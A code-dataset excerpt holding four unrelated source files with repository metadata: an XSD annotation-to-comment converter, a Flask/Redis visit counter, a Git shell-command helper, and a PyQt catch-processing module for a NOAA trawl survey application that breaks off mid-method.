725ea7b6637e2b0187e91054b6dc387a7ab7141a | 594f60b6a536b831d0df38abea7f0ffc0a2fd3cb | /utils_xml/change_comments.py | 7cf6b3dfb4c62a9e7680dc1f63740306c8c9dee9 | [] | no_license | mh70cz/py | 1478439fe939076cca3a30be2f2d29fb4e8a3cd9 | 7fc23f2133624c787e1dd4856322d48251cc6f0e | refs/heads/master | 2022-08-12T06:08:30.720164 | 2022-08-08T23:16:19 | 2022-08-08T23:16:19 | 95,386,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,157 | py | """ konvertuje obsah elemntů xs:documentation bez xml:lang do komentářů """
from lxml import etree
f_name_in = "TradeRegisterListRequest_orig.xsd"
f_name_out = "TradeRegisterListRequest.xsd"
def main():
tree = etree.parse(f_name_in)
root = tree.getroot()
namespaces = {'xs': 'http://www.w3.org/2001/XMLSchema',}
annotations = root.findall(".//xs:annotation", namespaces)
xml_lang = '{http://www.w3.org/XML/1998/namespace}lang'
for annotation in annotations:
documentations = annotation.findall("./xs:documentation", namespaces)
for documentation in documentations:
att = documentation.attrib
if att.get(xml_lang, None) in ["cs", "en", "sk"]:
# print(documentation.text)
pass
elif att.get(xml_lang, None) is None:
txt = documentation.text
comment = etree.Comment(txt)
documentation.getparent().remove(documentation)
# print("delelted: " + str(txt))
#annotation.insert(0, comment)
annotation.append(comment)
rough_bin_string = etree.tostring(root, encoding="utf-8",
xml_declaration=True, pretty_print=True)
format_xml(rough_bin_string)
# with open(f_name_out, "wb") as wf:
# wf.write(rough_bin_string)
# #tree.write(open('output.xml', 'wb'))
#tree.write(open(f_name_out, 'wb'), encoding='utf-8', xml_declaration=True, pretty_print=True)
def format_xml(xml_bin_string):
""" přidání Comment elementu do xs:annotation nepřidá nový řádek
tato procedura doformátuje a zapíše do souboru"""
output = ""
lenght = 0
s = xml_bin_string.decode("utf-8")
s = s.replace("--><", "-->\n<")
s = s.split("\n")
for line in s:
#print(line)
if "<xs:annotation>" in line:
lenght = len(line) - 15
elif ("</xs:annotation>" in line) and (len(line) < 19):
line = str(lenght * " ") + line
output += line + "\n"
with open(f_name_out, "w", encoding="utf-8") as wf:
wf.write(output)
main()
| [
"mh70@mh70.cz"
] | mh70@mh70.cz |
b7590d1db13d344f87703875cc4419fd26f5b6d4 | 7b2b076b216cde3dcb4caf1c930b196bd72e1a77 | /app.py | 43d3a97a38a9849494becb30c09b639146b1ab25 | [] | no_license | horisakis/docs_docker_get_started | 33b64de2757d8b2a9b6a7f4422367468551edc70 | 1a53fa921d5e9dd6bcd852aec4a329b78b08eb8f | refs/heads/master | 2020-07-23T06:27:06.355677 | 2019-09-10T09:15:31 | 2019-09-10T09:15:31 | 207,472,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | # -*- coding: utf-8 -*-
from flask import Flask
from redis import Redis, RedisError
import os
import socket
# Redis に接続
redis = Redis(host="redis", db=0, socket_connect_timeout=2, socket_timeout=2)
app = Flask(__name__)
@app.route("/")
def hello():
try:
visits = redis.incr("counter")
except RedisError:
visits = "<i>cannot connect to Redis, counter disabled</i>"
html = "<h3>Hello {name}!</h3>" \
"<b>Hostname:</b> {hostname}<br/>" \
"<b>Visits:</b> {visits}"
return html.format(name=os.getenv("NAME", "world"), hostname=socket.gethostname(), visits=visits)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
| [
"seiji.horisaki@gmail.com"
] | seiji.horisaki@gmail.com |
11bfe4747e741e5997ae8cf7b87271c553026bcd | e7b4150f8b2155a563ec64a6594ebf04f5489344 | /Git/GitHelper.py | 7058fccd78e69650361da58656d42d9f46919b4c | [] | no_license | AlphaSirius/RepositoryMerger | af2aaa74b7c0554abfd9679d8bf881a133a920a7 | 7ca1a3d8c4e52dfd0db37f5a086e5e869f05490f | refs/heads/master | 2020-12-02T08:10:38.092465 | 2017-09-26T07:54:52 | 2017-09-26T07:54:52 | 96,782,356 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,251 | py |
import subprocess
from subprocess import check_output
from Git.Log.LogHelper import info, verbose, verboseList
from Git.Shell.ShellHelper import executeCommandOnShell
masterBranchName = "master"
import os
import time
def checkValidityOfBranch(branchName, repoPath):
result = executeCommandOnShell("git branch -a",repoPath, True)
verbose("git branch -a result in " +repoPath)
verboseList(result)
value = branchName in result
info(branchName + " exists in "+repoPath+":" + str(value))
print(branchName + " exists in " + repoPath + ":" + str(value))
return branchName
def pullLatestChangesFromRemoteRepo(repoPath,repoUrl):
print(executeCommandOnShell("git pull -a",repoPath, True))
def cloneRepo(repoPath,repoUrl):
cloneCommand = "git clone " + repoUrl
executeCommandOnShell(cloneCommand, repoPath, True)
def checkoutBranch(repoPath, branchName):
checkoutCommand = "git checkout -f " + branchName
executeCommandOnShell(checkoutCommand, repoPath, True)
def gitAddAll(repoPath):
executeCommandOnShell("git add -A",repoPath, False)
def gitCommit(repoPath, commitMessage):
commitCommand = "git commit -m \"" + commitMessage +"\""
executeCommandOnShell(commitCommand, repoPath, True) | [
"sunil8sahu@gmail.com"
] | sunil8sahu@gmail.com |
d572a6814773a8b7f6c85a0e354e12f8655e0a35 | c4ee4a9d28425aa334038ad174c7b1d757ff45db | /py/trawl/ProcessCatch.py | c12d30c7ce3a588dd4ade0e94526c4bea1bcaaf5 | [
"MIT"
] | permissive | nwfsc-fram/pyFieldSoftware | 32b3b9deb06dba4a168083a77336613704c7c262 | 477ba162b66ede2263693cda8c5a51d27eaa3b89 | refs/heads/master | 2023-08-03T07:38:24.117376 | 2021-10-20T22:49:51 | 2021-10-20T22:49:51 | 221,750,910 | 1 | 1 | MIT | 2023-07-20T13:13:25 | 2019-11-14T17:23:47 | Python | UTF-8 | Python | false | false | 56,327 | py | __author__ = 'Todd.Hay'
# -------------------------------------------------------------------------------
# Name: ProcessCatch.py
# Purpose:
#
# Author: Todd.Hay
# Email: Todd.Hay@noaa.gov
#
# Created: Jan 10, 2016
# License: MIT
#-------------------------------------------------------------------------------
from PyQt5.QtCore import pyqtProperty, pyqtSignal, pyqtSlot, QObject, QVariant, Qt, QModelIndex, \
QAbstractItemModel, QByteArray, QAbstractListModel, QItemSelection, QPersistentModelIndex
from PyQt5.Qt import QJSValue, QQmlEngine
from py.common.FramListModel import FramListModel
from py.common.FramTreeModel import FramTreeModel
from py.common.FramTreeItem import FramTreeItem
import logging
import unittest
import pdb
from py.trawl.TrawlBackdeckDB_model import Specimen, Catch, Hauls, SpeciesSamplingPlanLu
from peewee import *
from playhouse.shortcuts import model_to_dict, dict_to_model
from py.common.SoundPlayer import SoundPlayer
class SpeciesListModel(FramListModel):
def __init__(self, parent=None):
super().__init__()
self.add_role_name(name='taxonomyId')
self.add_role_name(name="scientificName")
self.add_role_name(name="commonName1")
self.add_role_name(name="commonName2")
self.add_role_name(name="commonName3")
self.add_role_name(name='displayName')
self.add_role_name(name='protocol')
self.add_role_name(name='weight')
self.add_role_name(name='count')
self.add_role_name(name='depthMin')
self.add_role_name(name='depthMax')
self.add_role_name(name='latMin')
self.add_role_name(name='latMax')
self.add_role_name(name='isMostRecent')
self.add_role_name(name='isLastNOperations')
self.add_role_name(name='type')
self.add_role_name(name='sampleType')
self.add_role_name(name='catchContentId')
self.add_role_name(name='catchId')
class SpeciesTreeModel(FramTreeModel):
"""
Class used for the SelectedSpeciesTreeView. This is a custom FramTreeModel that allows one to add/remove
mixes, which are hierarchical in nature
"""
def __init__(self, headers=[], data=[]):
super().__init__(headers=headers, data=data)
@pyqtSlot(result=QVariant)
def sortCatch(self):
"""
Sort the list in-place alphabetically with the species at top, and then mixes
occurring beneath that, and then finally debris
"""
# List used to keep track of which items needs to be re-expanded after the sort operation is completed
expandedList = []
typeCol = self.getColumnNumber("type")
displayNameCol = self.getColumnNumber("displayName")
# Sort main list by item type using SORT_ORDER & then alphabetically within the Taxon, Mix, Debris lists
SORT_ORDER = {"Taxon": 0, "Mix": 1, "Debris": 2}
MIX_SORT_ORDER = {"Taxon": 0, "Submix": 1, "Debris": 2}
SUBMIX_SORT_ORDER = {"Taxon": 0, "Debris": 1}
# sorted_items = sorted(self._rootItem.childItems, key=lambda x: (SORT_ORDER[x.data(typeCol).value()], x.data(displayNameCol).value()))
sorted_items = sorted(self._rootItem.childItems, key=lambda x: (SORT_ORDER[x.data(typeCol).value()], x.data(displayNameCol).value().lower()))
self.removeRows(0, self._rootItem.childCount(), QModelIndex())
self.setChildItems(sorted_items, QModelIndex())
# Sort mixes by Taxon > Submix > Debris, and then alphabetically within each of those categories
mixes = [x for x in self._rootItem.childItems if x.data(typeCol).value() == "Mix"]
for mix in mixes:
mixIdx = self.createIndex(0, 0, mix)
# TODO Todd Hay - Fix sorting mixes when mix # >= 10
# see https://arcpy.wordpress.com/2012/05/11/sorting-alphanumeric-strings-in-python/
# logging.info('mix children: ' + str(mix.childItems))
sorted_mix = sorted(mix.childItems, key=lambda x: (MIX_SORT_ORDER[x.data(typeCol).value()], x.data(displayNameCol).value().lower()))
self.removeRows(0, mix.childCount(), mixIdx)
self.setChildItems(sorted_mix, mixIdx)
if mix.isExpanded:
expandedList.append(mix)
# Sort submixes by Taxon > Debris, and then alphabetically within each of those categories
submixes = [y for y in mix.childItems if y.data(typeCol).value() == "Submix"]
for submix in submixes:
submixIdx = self.createIndex(0, 0, submix)
# TODO Todd Hay - Fix sorting submixes when mix # >= 10
# see https://arcpy.wordpress.com/2012/05/11/sorting-alphanumeric-strings-in-python/
sorted_submix = sorted(submix.childItems, key=lambda z: (SUBMIX_SORT_ORDER[z.data(typeCol).value()], z.data(displayNameCol).value().lower()))
self.removeRows(0, submix.childCount(), submixIdx)
self.setChildItems(sorted_submix, submixIdx)
if submix.isExpanded:
expandedList.append(submix)
# Convert the expandedList to the current QModelIndex's
expandedList = [self.createIndex(x.row, 0, x) for i, x in enumerate(expandedList)]
return expandedList
class ProcessCatch(QObject):
"""
Class for the ProcessCatchScreen. Handles getting all of the species data
"""
haulIdChanged = pyqtSignal()
speciesModelChanged = pyqtSignal()
speciesCountChanged = pyqtSignal()
totalWeightChanged = pyqtSignal()
selectedIndexChanged = pyqtSignal()
activeMixChanged = pyqtSignal()
def __init__(self, app=None, db=None):
super().__init__()
self._logger = logging.getLogger(__name__)
self._app = app
self._db = db
self._mixes = dict()
self._active_mix = {"catchId": None, "displayName": None}
# Populate lists that are used in the tvAvailableSpecies TableView
self._species = self._get_species()
self._recent_species = [s for s in self._species if s["isMostRecent"].upper() == "TRUE"]
self._debris = self._get_debris()
# Create the models for the available + selected Table/Tree views
self.avFullModel = SpeciesListModel()
self.avRecentModel = SpeciesListModel()
self.avDebrisModel = SpeciesListModel()
self.seModel = self._set_selected_species_model()
self._current_species_model = self.avFullModel
self._species_count = 0
self._total_weight = 0
self._filter = ""
self._corals = self.get_coral_species()
self._salmon = self.get_salmon_species()
self._sponges = self.get_sponge_species()
self._rockfish = self.get_rockfish_species()
self._sound_player = SoundPlayer()
self._selected_index = None
# pdb.set_trace()
@pyqtProperty(QVariant, notify=activeMixChanged)
def activeMix(self):
"""
Method to return the self._active_mix. This is the currently chosen list used in combination when a user
want to a new species to a mix that species is added to this mix
:return:
"""
return self._active_mix
@activeMix.setter
def activeMix(self, value):
"""
Method to set the self._active_mix
:param value:
:return:
"""
self._active_mix = value
self.activeMixChanged.emit()
@pyqtSlot()
def initialize_lists(self):
"""
Method to reset all of the FramListModels to their original state of items. This is called when
the ProcessCatch is first initialized and then also whenever the haul id is changed, as the tree
needs to be rebuilt from the database at that point
:return: None
"""
# Establish working lists for available Full / Recent / Debris lists + filtered variants
self.avFullSpecies = list(self._species)
self.avFullSpeciesFiltered = list(self._species)
self.avRecentSpecies = list(self._recent_species)
self.avRecentSpeciesFiltered = list(self._recent_species)
self.avDebris = list(self._debris)
self.avDebrisFiltered = list(self._debris)
# Reset the list items
self.avFullModel.setItems(self.avFullSpeciesFiltered)
self.avRecentModel.setItems(self.avRecentSpeciesFiltered)
self.avDebrisModel.setItems(self.avDebrisFiltered)
def _get_fram_protocols(self):
"""
Method to gather the protocol display name for the FRAM protocols
:return: dict - containing taxon_id: protocol name
"""
protocols = []
protocol_sql = """
SELECT taxonomy_id, display_name FROM SPECIES_SAMPLING_PLAN_LU WHERE
PLAN_NAME = 'FRAM Standard Survey' AND
DISPLAY_NAME != 'Whole Specimen ID'
"""
# AND
# DISPLAY_NAME != 'Coral' AND
# DISPLAY_NAME != 'Salmon';
protocols = self._db.execute(query=protocol_sql)
protocols = {x[0]: x[1] for x in protocols}
return protocols
@pyqtSlot()
def initialize_tree(self):
"""
Method called when the haul id is changed that initializes the tree with the data from the database
:return:
"""
model = self.seModel
# Clear the tree + it's descendants list
model.clear()
self.speciesCount = 0
total_weight = 0
# Populate the tree
keys = ["catchId", "parentCatchId", "displayName", "isMix", "isDebris", "taxonomyId", "scientificName",
"commonName1", "commonName2", "commonName3",
"depthMin", "depthMax", "latMin", "latMax",
"weight", "count", "isMostRecent", "isLastNOperations", "catchContentId", "protocol"]
dataKeys = ["catchId", "displayName", "taxonomyId", "scientificName",
"commonName1", "commonName2", "commonName3",
"depthMin", "depthMax", "latMin", "latMax",
"weight", "count", "isMostRecent", "isLastNOperations", "type", "catchContentId", "protocol"]
# TODO Todd Hay sampleType - do I need to include this, I don't think so as I'm not using it.
# sql = "SELECT c.CATCH_ID, c.PARENT_CATCH_ID, c.DISPLAY_NAME, c.IS_MIX, c.IS_DEBRIS, cc.TAXONOMY_ID, " + \
# "t.SCIENTIFIC_NAME, t.COMMON_NAME_1, t.COMMON_NAME_2, t.COMMON_NAME_3, " + \
# "t.HISTORICAL_DEPTH_MIN, t.HISTORICAL_DEPTH_MAX, t.HISTORICAL_LAT_MIN, t.HISTORICAL_LAT_MAX, " + \
# "c.weight_kg, c.sample_count_int, cc.IS_MOST_RECENT, cc.IS_LAST_N_OPERATIONS, cc.CATCH_CONTENT_ID, " + \
# "s.DISPLAY_NAME " + \
# "FROM CATCH c " + \
# "LEFT JOIN CATCH_CONTENT_LU cc ON c.CATCH_CONTENT_ID = cc.CATCH_CONTENT_ID " + \
# "LEFT JOIN TAXONOMY_LU t ON t.TAXONOMY_ID = cc.TAXONOMY_ID " + \
# "LEFT JOIN SPECIES_SAMPLING_PLAN_LU s ON t.TAXONOMY_ID = s.TAXONOMY_ID " + \
# "WHERE c.OPERATION_ID = ? AND (s.PLAN_NAME = 'FRAM Standard Survey' or s.PLAN_NAME IS NULL);"
# Returns a dictionary of taxon_id: protocol name - these are used to compare against the sql query below
# to set the protocol display to a FRAM Standard Survey protocol name if one exists, otherwise, use what is
# retrieved from the query
protocols = self._get_fram_protocols()
sql = """
SELECT c.CATCH_ID, c.PARENT_CATCH_ID, c.DISPLAY_NAME, c.IS_MIX, c.IS_DEBRIS, cc.TAXONOMY_ID,
t.SCIENTIFIC_NAME, t.COMMON_NAME_1, t.COMMON_NAME_2, t.COMMON_NAME_3,
t.HISTORICAL_DEPTH_MIN, t.HISTORICAL_DEPTH_MAX, t.HISTORICAL_LAT_MIN, t.HISTORICAL_LAT_MAX,
c.weight_kg, c.sample_count_int, cc.IS_MOST_RECENT, cc.IS_LAST_N_OPERATIONS, cc.CATCH_CONTENT_ID,
s.DISPLAY_NAME
FROM CATCH c
LEFT JOIN CATCH_CONTENT_LU cc ON c.CATCH_CONTENT_ID = cc.CATCH_CONTENT_ID
LEFT JOIN TAXONOMY_LU t ON t.TAXONOMY_ID = cc.TAXONOMY_ID
LEFT JOIN SPECIES_SAMPLING_PLAN_LU s ON t.TAXONOMY_ID = s.TAXONOMY_ID
WHERE c.OPERATION_ID = ?
GROUP BY CATCH_ID
ORDER BY CATCH_ID
"""
params = [self._app.state_machine._haul["haul_id"], ]
results = self._db.execute(query=sql, parameters=params).fetchall()
if results:
results = [dict(zip(keys, values)) for values in results]
for x in results:
if x["isMix"].lower() == "false" and x["isDebris"].lower() == "false":
x["type"] = "Taxon"
elif x["isMix"].lower() == "true" and x["isDebris"].lower() == "false":
if "submix" in x["displayName"].lower():
x["type"] = "Submix"
else:
x["type"] = "Mix"
if isinstance(self._active_mix, QJSValue):
self._active_mix = self._active_mix.toVariant()
if self._active_mix["catchId"] is None:
self.activeMix = {"displayName": x["displayName"], "catchId": x["catchId"]}
elif x["isMix"].lower() == "false" and x["isDebris"].lower() == "true":
x["type"] = "Debris"
# Update weights / counts
totals = self._get_basket_weights_counts(catch_id=x["catchId"])
x["weight"] = totals["weight"]
x["count"] = totals["count"]
# Update protocol display using the protocols dict obtained above
x["protocol"] = protocols[x["taxonomyId"]] if x["taxonomyId"] in protocols else x["protocol"]
firstLevelItems = [x for x in results if x["parentCatchId"] is None]
for item in firstLevelItems:
# Get the data items
data = {x: item[x] for x in item if x in dataKeys}
# logging.info("adding data to treeview: {0}".format(data))
# Update the total weight
total_weight += data["weight"]
# Set None values to ""
data.update((k, "") for k, v in data.items() if v is None)
# Add to the FramTreeView
parentIdx = self.append_tree_item(data=data, parentIdx=QModelIndex())
# Remove from the FramListModel, i.e. the left-side ListView
if data["type"] != "Mix" and data["type"] != "Submix":
self.remove_list_item(data=data)
# For a mix, add children to the mix
if data["type"] == "Mix":
# Update the FramTreeModel self._mixCount
model.addMixCount("Mix")
# Get all of the Mix children, add those, but don't get/add the Mix baskets (the last argument)
children = [x for x in results if x["parentCatchId"] == item["catchId"] and x["type"] != "Mix"]
for child in children:
# Add to the FramTreeView
childData = {x: child[x] for x in child if x in dataKeys}
childData.update((k, "") for k, v in childData.items() if v is None)
subparentIdx = self.append_tree_item(data=childData, parentIdx=parentIdx)
# logging.info('childData: ' + str(childData["displayName"]) + ', ' + str(childData["type"]))
# Remove from the FramListModel
if childData["type"] != "Submix" and childData["type"] != "Mix":
self.remove_list_item(data=childData)
# Add Submixes
if childData["type"] == "Submix":
# Update the running count of the submixes for the given mix
model.addMixCount("Submix", parentIdx)
# Get the submix children, but don't get/add the submix baskets (the last argument here)
subchildren = [x for x in results if x["parentCatchId"] == child["catchId"] and x["type"] != "Submix"]
for subchild in subchildren:
# Add to the FramTreeView
subchildData = {x: subchild[x] for x in subchild if x in dataKeys}
subchildData.update((k, "") for k, v in subchildData.items() if v is None)
self.append_tree_item(data=subchildData, parentIdx=subparentIdx)
# Remove from the FramListModel
self.remove_list_item(data=subchildData)
model.sortCatch()
self.totalWeight = total_weight
logging.info("Initializing tree, mixes: {0}".format(self.seModel.mixCount))
@pyqtSlot(str)
def playSound(self, sound_name):
"""
Play a sound
:param sound_name:
:return:
"""
if not isinstance(sound_name, str):
return
self._sound_player.play_sound(sound_name=sound_name)
@staticmethod
def _filter_model(filter_text, data, type):
"""
Method to return a filtered list of the species matching the filter_text
:param filter_text: text against which to query
:param species: listing of the input species to query
:return: filtered list
"""
if type == "Debris":
return [d for d in data if filter_text.upper() in d['displayName'].upper()]
else:
filtered_list = [d for d in data
if (filter_text.upper() in d['displayName'].upper() or
filter_text.upper() in d['scientificName'].upper()or
(d["commonName1"] is not None and filter_text.upper() in d['commonName1'].upper()) or
(d["commonName2"] is not None and filter_text.upper() in d['commonName2'].upper()) or
(d["commonName3"] is not None and filter_text.upper() in d['commonName3'].upper()))]
if filter_text == "":
return filtered_list
start_match_list = [x for x in filtered_list if x['displayName'].upper().startswith(filter_text.upper())]
# start_match_list = sorted(start_match_list, key=lambda x: x["displayName"].lower())
remaining_list = [x for x in filtered_list if x not in start_match_list]
# remaining_list = sorted(remaining_list, key=lambda x: x["displayName"].lower())
sorted_list = start_match_list + remaining_list
return sorted_list
@pyqtSlot(str)
def filter_species(self, filter_text=""):
"""
Method use to filter the AvailableSpecies list model based on what the user types in the textbox
:param filter_text: Text that the user entered to filter the species
:return: None
"""
self._filter = filter_text
self.avFullSpeciesFiltered = self._filter_model(filter_text=filter_text, data=self.avFullSpecies, type="Taxon")
self.avFullModel.setItems(self.avFullSpeciesFiltered)
self.avRecentSpeciesFiltered = self._filter_model(filter_text=filter_text, data=self.avRecentSpecies, type="Taxon")
self.avRecentModel.setItems(self.avRecentSpeciesFiltered)
self.avDebrisFiltered = self._filter_model(filter_text=filter_text, data=self.avDebris, type="Debris")
self.avDebrisModel.setItems(self.avDebrisFiltered)
@pyqtSlot(QModelIndex, result=bool)
def add_list_item(self, index):
"""
Method to add a species back to the tvAvailableList FramListModel
:param index - QModelIndex - item to add back
:return: bool - successful or not (true/false)
"""
if not isinstance(index, QModelIndex):
return False
# Add to the Full List Model
item = self.seModel.getItem(index)
data = item.getAllDataAsDict()
# Clear out any weight + count data, i.e. if baskets had been taken, otherwise these could reappear
# when the item is added back to the TreeView
data["count"] = None
data["weight"] = None
type = data["type"]
filterList = [v for k, v in data.items() if v != "" and v is not None and k in ("displayName", "scientificName", "commonName1", "commonName2", "commonName3")]
if type == "Debris":
data["displayName"] = data["displayName"].replace("Debris - ", "")
self.avDebris.append(data)
self.avDebris = sorted(self.avDebris, key=lambda k: k['displayName'].lower())
if any(self._filter.lower() in x.lower() for x in filterList):
self.avDebrisModel.appendItem(data)
self.avDebrisModel.sort("displayName")
self.avDebrisFiltered.append(data)
self.avDebrisFiltered = sorted(self.avDebrisFiltered, key=lambda k: k['displayName'].lower())
elif type == "Mix" or type == "Submix":
# Need to recurse these to get all children and add back to the list
for child in item.children:
newIndex = self.seModel.createIndex(child.row, 0, child)
self.add_list_item(newIndex)
elif type == "Taxon":
self.avFullSpecies.append(data)
self.avFullSpecies = sorted(self.avFullSpecies, key=lambda k: k['displayName'].lower())
# Check if the displayName exists in the self.avFullSpeciesFiltered
if any(self._filter.lower() in x.lower() for x in filterList):
self.avFullModel.appendItem(data)
self.avFullModel.sort("displayName")
self.avFullSpeciesFiltered.append(data)
self.avFullSpeciesFiltered = sorted(self.avFullSpeciesFiltered, key=lambda k: k['displayName'].lower())
# TODO Todd Hay - are we using isMostRecent or isLastNOperations - probably the latter
if data["isMostRecent"] == "True":
self.avRecentSpecies.append(data)
self.avRecentSpecies = sorted(self.avRecentSpecies, key=lambda k: k['displayName'].lower())
# if any(d["displayName"] == data["displayName"] for d in self.avRecentSpeciesFiltered):
if any(self._filter.lower() in x.lower() for x in filterList):
self.avRecentModel.appendItem(data)
self.avRecentModel.sort("displayName")
self.avRecentSpeciesFiltered.append(data)
self.avRecentSpeciesFiltered = sorted(self.avRecentSpeciesFiltered, key=lambda k: k['displayName'].lower())
return True
@pyqtSlot(QVariant)
def remove_list_item(self, data):
"""
Method to remove an item from the FramListModel
:param data: dict - dictionary of the data to delete
:return: None
"""
if isinstance(data, QJSValue):
data = data.toVariant()
rolename = "displayName"
value = data[rolename]
type = data["type"]
if type == "Taxon":
idx = self.avFullModel.get_item_index(rolename=rolename, value=value)
if idx >= 0:
self.avFullModel.removeItem(idx)
self.avFullSpecies = [x for x in self.avFullSpecies if x["displayName"] != value]
self.avFullSpeciesFiltered = [x for x in self.avFullSpeciesFiltered if x["displayName"] != value]
if data["isMostRecent"] == "True":
idx = self.avRecentModel.get_item_index(rolename=rolename, value=value)
if idx >= 0:
self.avRecentModel.removeItem(idx)
self.avRecentSpecies = [x for x in self.avRecentSpecies if x["displayName"] != value]
self.avRecentSpeciesFiltered = [x for x in self.avRecentSpeciesFiltered if x["displayName"] != value]
elif type == "Debris":
idx = self.avDebrisModel.get_item_index(rolename=rolename, value=value)
if idx >= 0:
self.avDebrisModel.removeItem(idx)
self.avDebris = [x for x in self.avDebris if x["displayName"] != value]
self.avDebrisFiltered = [x for x in self.avDebrisFiltered if x["displayName"] != value]
def append_tree_item(self, data, parentIdx):
"""
Method to insert a row in the self._selected_species_model model. This is done during the initialization
of the TreeView only, as we don't want to insert new records into the database. See append_tree_item_with_sql
when a user actually chooses to add a new item to the TreeView
:param data: QJSValue dict - data to be appended as a new row
:param parentIdx: QModelIndex - index of the currently selected item in tvSelectedSpecies
:return: None
"""
model = self.seModel
if isinstance(parentIdx, QModelIndex) and parentIdx.row() >= 0:
parentItem = model.getItem(parentIdx)
else:
parentIdx = QModelIndex()
parentItem = model._rootItem
if isinstance(data, QJSValue):
data = data.toVariant() # Convert from QJSValue to dict
status = model.insertRows(parentItem.childCount(), 1, parentIdx)
child = parentItem.child(parentItem.childCount()-1)
row = child.row
# Update the speciesCount - I call the method which then emits a signal
if data["type"] == "Taxon":
self.speciesCount += 1
# Update the newly created child/row data with the data from tvAvailableSpecies model
for element in data:
if element in model.rootData: # and data[element] is not None and data[element] != "":
column = model.getColumnNumber(element)
if column >= 0:
index = model.createIndex(row, column, child)
role = model.getRoleNumber(role_name=element)
if element == "displayName" and data["type"] == "Debris":
data[element] = "Debris - " + data[element]
status = model.setData(index, data[element], role)
# Update the model._descendantSpecies list - do this after the data has been updated
colNum = model.getColumnNumber("taxonomyId")
taxonId = child.data(colNum)
if taxonId.value():
model.append_descendant(taxonId)
return model.createIndex(row, 0, child)
@pyqtProperty(int, notify=haulIdChanged)
def haulId(self):
self._initialize_tree()
return self._haul_id
@haulId.setter
def haulId(self, value):
self._haul_id = self._app.state_machine._haul["haul_id"]
self.haulIdChanged.emit()
@pyqtProperty(float, notify=totalWeightChanged)
def totalWeight(self):
"""
Method to return the total weight for the haul
:return:
"""
return self._total_weight
@totalWeight.setter
def totalWeight(self, value):
if not isinstance(value, float):
return
self._total_weight = value
self.totalWeightChanged.emit()
@pyqtProperty(int, notify=speciesCountChanged)
def speciesCount(self):
"""
Return the species_count
:return: int - species_count
"""
return self._species_count
@speciesCount.setter
def speciesCount(self, value):
"""
Set the self._species_count
:param value: int - value to set it to
:return:
"""
if value is None:
return
self._species_count = value
self.speciesCountChanged.emit()
@pyqtProperty(QObject, notify=speciesModelChanged)
def currentSpeciesModel(self):
"""
Property used to know if the currently selected speciesModel is the Full List or the
Most Recent List
:param model:
:return:
"""
return self._current_species_model
@currentSpeciesModel.setter
def currentSpeciesModel(self, model):
"""
Method for setting the self._speciesModel
:param model:
:return:
"""
self._current_species_model = model
self.speciesModelChanged.emit()
@pyqtProperty(QVariant)
def species(self):
"""
Get the full listing of species
:return: List of species
"""
return self._species
@pyqtProperty(FramListModel, notify=speciesModelChanged)
def FullAvailableSpeciesModel(self):
"""
Get the model for the tvAvailableSpecies TableView
:return: AvailableSpeciesMode
"""
return self.avFullModel
# TODO (todd.hay) Implement NOTIFY signal per warning I'm receiving and discussion of it here:
# http://stackoverflow.com/questions/6728615/warning-about-non-notifyable-properties-in-qml
@pyqtProperty(FramListModel, notify=speciesModelChanged)
def MostRecentAvailableSpeciesModel(self):
"""
Return the model of the most recent available species
:return:
"""
return self.avRecentModel
@pyqtProperty(FramTreeModel, notify=speciesModelChanged)
def SelectedSpeciesModel(self):
"""
Return the model of the selected species, a FramTreeModel
:return:
"""
return self.seModel
@pyqtProperty(FramListModel, notify=speciesModelChanged)
def DebrisModel(self):
"""
Return the model of the debris, a FramListModel
:return:
"""
return self.avDebrisModel
@pyqtSlot(QModelIndex, result=QVariant)
def getParent(self, idx):
model = self.seModel
typeCol = model.get_role_number("type")
type = model.data(idx, typeCol).value()
if type and (type == "Mix" or type == "Submix"):
parent = model.item(idx).value()
else:
parent = model._rootItem
return parent
@pyqtSlot(QModelIndex, QVariant, result=bool)
def checkTaxonId(self, idx, selection):
"""
Method to determine if a species with the given taxonomy id already exists in the current
level of the tvSelectedSpecies FramTreeModel. If so, don't add it, just highlight that row
:param idx: QModelIndex - index of the selected row in tvSelectedSpecies
:return: bool - true or false if the taxon_id already exists
"""
sel_model = self.seModel
root = sel_model._rootItem
# rootIndex = model.createIndex(root.row, 0, root)
taxonCol = sel_model.get_role_number("taxonomyId")
typeCol = sel_model.get_role_number("type")
type = sel_model.data(idx, typeCol).value()
if type and (type == "Mix" or type == "Submix"):
parent = sel_model.item(idx).value()
else:
parent = root
logging.info('selection: ' + str(selection))
for row in selection: #self.currentSpeciesModel.selectionModel():
logging.info("row: " + str(row))
result = False
return result
@pyqtSlot(QJSValue, QModelIndex, str)
def append_tree_item_with_sql(self, data, idx, parent_type):
"""
Method to insert a row in the self._selected_species_model model
:param data: QJSValue dict - data to be appended as a new row
:param idx: QModelIndex - index of the currently selected item in tvSelectedSpecies
:param parent_type: str - the type of entry being added: Mix, Taxon, or Debris
:return: None
"""
if isinstance(data, QJSValue):
data = data.toVariant() # Convert from QJSValue to dict
# Get references to key objects of interest
model = self.seModel
dataType = data["type"]
# Insert a new row and get a handle to the newly inserted child + it's row position
if (parent_type == "Mix" or parent_type == "Submix") and dataType != "Debris": # Mix is the current type
parent = model.getItem(idx)
parentIdx = idx
# elif parent_type == "Taxon" or parent_type == "Debris": # Taxon or Debris is the current type
# parent = model._rootItem
# parentIdx = QModelIndex()
else: # Type is None - nothing is selected
parent = model._rootItem
parentIdx = QModelIndex()
# insertRows > position, count, parent index
status = model.insertRows(parent.childCount(), 1, parentIdx)
# status = model.insertRows(parent.childCount(), 1, idx.parent())
child = parent.child(parent.childCount()-1)
row = child.row
# Update the speciesCount - I call the method which then emits a signal
if dataType == "Taxon":
self.speciesCount += 1
# Update the newly created child/row data with the data from tvAvailableSpecies model
for element in data:
if element in model.rootData: # and data[element] is not None: # and data[element] != "":
column = model.getColumnNumber(element)
if column >= 0:
index = model.createIndex(row, column, child)
role = model.getRoleNumber(role_name=element)
if element == "displayName" and data["type"] == "Debris":
data[element] = "Debris - " + data[element]
status = model.setData(index, data[element], role)
# Update the model._descendantSpecies list - do this after the data has been updated
colNum = model.getColumnNumber("taxonomyId")
taxonId = child.data(colNum)
if taxonId.value():
model.append_descendant(taxonId)
# Insert new record in the CATCH table for the given haul
is_debris = "False"
is_mix = "False"
displayName = data["displayName"]
catchContentId = None
if data["type"] == "Debris":
displayName = displayName.replace("Debris - ", "")
is_debris = "True"
catchContentId = data["catchContentId"]
